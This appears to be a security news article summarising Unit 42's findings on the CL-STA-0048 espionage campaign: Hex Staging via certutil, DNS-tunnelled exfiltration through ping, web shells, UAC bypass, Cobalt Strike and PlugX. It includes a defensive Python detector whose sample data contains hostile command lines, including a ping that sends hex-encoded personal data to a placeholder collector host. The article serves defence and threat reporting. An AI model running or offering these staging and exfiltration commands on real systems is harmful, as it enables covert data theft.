A recent investigation by Unit 42 of Palo Alto Networks has uncovered a sophisticated, state-sponsored cyberespionage operation, tracked as CL-STA-0048.
The campaign targeted high-value organizations in South Asia, particularly a telecommunications company.
Employing rare tactics and tools, the attackers leveraged unique payload delivery methods and exploited vulnerabilities in widely used services such as IIS, Apache Tomcat, and MSSQL.
Analysts attribute the campaign with moderate-to-high confidence to Chinese-origin threat actors based on their tactics, techniques, and victimology.
This operation focused on extracting sensitive data, including government personnel records and organizational secrets, while evading detection through advanced obfuscation methods.
Unit 42 classifies this activity under the umbrella of advanced persistent threats (APTs), underscoring its nation-state-level sophistication.
Unique Payload Delivery and Exfiltration Techniques
A standout technique in this campaign is what Unit 42 has termed “Hex Staging.”
This method involves delivering payloads in hex-encoded chunks before reconstructing them into executable code on the target system.
By using native tools like certutil to decode the payloads, the attackers avoided triggering conventional detection mechanisms.
Hex Staging has been used to deploy a range of malicious tools, including components of PlugX, a Remote Access Trojan (RAT) frequently linked to Chinese-speaking threat groups.
The attackers also employed an unorthodox exfiltration method involving DNS tunneling.
By formatting stolen data into DNS queries and sending them via ping requests to a controlled DNS logging service, they stealthily transmitted sensitive information.
This approach bypassed traditional data exfiltration monitoring tools.
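As an added illustration that is not from the Unit 42 report or this article, the following Python scans constructed sample process command lines for the two patterns just described: certutil hex decoding (Hex Staging) and ping requests whose DNS labels carry hex-encoded data. The sample command lines, the hostname, and the binary-copy reassembly heuristic are my own assumptions, not indicators from the report.

```python
import re
from typing import Dict, List

# Constructed sample process-creation command lines (not from the Unit 42 report).
SAMPLE_CMDLINES = [
    r"certutil -decodehex C:\Windows\Temp\p1.txt C:\Windows\Temp\stage.dll",
    r"ping -n 1 4e616d653d4a6f686e3b4d6f62696c653d353535.collector.example.test",
    r"ping -n 1 www.example.com",
    r"certutil -hashfile C:\tools\app.exe SHA256",
    r"cmd.exe /c copy /b C:\Windows\Temp\p1.txt+C:\Windows\Temp\p2.txt C:\Windows\Temp\joined.txt",
]

# A long DNS label made only of hex digits is a weak signal alone; paired with a
# ping command it matches the exfiltration pattern described in the article.
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{24,63}$")
CERTUTIL_DECODE_FLAGS = {"-decodehex", "-decode"}  # both are real certutil verbs

def hex_labels(fqdn: str) -> List[str]:
    """Return the DNS labels of fqdn that look like raw hex payload."""
    return [lbl for lbl in fqdn.split(".") if HEX_LABEL.match(lbl)]

def preview_hex_label(label: str) -> str:
    """Decode a suspicious hex label so an analyst can see what left the network."""
    return bytes.fromhex(label).decode("latin-1", errors="replace")

def classify(cmdline: str) -> List[str]:
    """Map one command line to zero or more detection tags."""
    argv = cmdline.split()
    if not argv:
        return []
    exe = argv[0].lower().rsplit("\\", 1)[-1]
    lowered = [a.lower() for a in argv[1:]]
    tags: List[str] = []
    if exe in ("certutil", "certutil.exe") and CERTUTIL_DECODE_FLAGS & set(lowered):
        tags.append("hex_staging_certutil_decode")
    if exe in ("ping", "ping.exe"):
        # The hostname is the last argument that is neither a switch nor a switch value.
        targets = [a for a in argv[1:] if not a.startswith("-") and not a.isdigit()]
        if targets and hex_labels(targets[-1]):
            tags.append("dns_exfil_hex_label_in_ping")
    # Assumed reassembly heuristic: binary concatenation of staged chunks.
    if "copy" in lowered and "/b" in lowered and any("+" in a for a in argv):
        tags.append("chunk_reassembly_binary_copy")
    return tags

def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Return only the command lines that produced at least one tag."""
    return {c: classify(c) for c in cmdlines if classify(c)}

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_CMDLINES).items():
        print(", ".join(tags), "<-", line)
```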
Exploitation of Multiple Services and Escalation Tactics
The attackers showcased remarkable adaptability, sequentially targeting vulnerabilities within IIS, Apache Tomcat, and unpatched MSSQL servers.
Initial attempts to exploit IIS web servers through web shells were blocked by Palo Alto Networks’ Cortex XDR solution.
Following this, the attackers pivoted to Apache Tomcat servers, deploying a ColdFusion-based web shell, which was also thwarted.
Success was finally achieved with an MSSQL server, granting the attackers access to carry out reconnaissance and execute further payloads.
To escalate privileges, the threat actors utilized advanced tools like SspiUacBypass and components of the Potato Suite.
These tools allowed them to bypass User Account Control (UAC) and execute commands with elevated privileges.
The operation’s second phase saw the deployment of Cobalt Strike beacons, an industry-favored tool for post-compromise activities.
Using the Hex Staging method, the attackers installed Cobalt Strike loaders on targeted systems, enabling them to exfiltrate data and deploy additional malware.
A notable focus was placed on stealing valuable database records.
Attackers created unauthorized privileged database users and executed malicious SQL scripts to harvest and aggregate sensitive client data, such as names, mobile numbers, and personal identifiers.
The connection to Chinese threat ecosystems is further highlighted by the use of PlugX, Winos4.0-based malware, and specific command-and-control (C2) IPs and domains, which overlap with patterns seen in other Chinese APT campaigns, including those linked to a group known as DragonRank.
This campaign underscores the critical necessity of proactive cybersecurity defenses.
Organizations are urged to prioritize patching known vulnerabilities in commonly exploited services and to employ robust monitoring tools capable of detecting advanced tactics, including obfuscated payload delivery and DNS-based exfiltration.
The identified campaign reaffirms the persistent threat posed by nation-state actors targeting sensitive organizations.
Vigilant IT hygiene, routine vulnerability assessments, and leveraging advanced cybersecurity solutions remain paramount to mitigating such advanced attacks.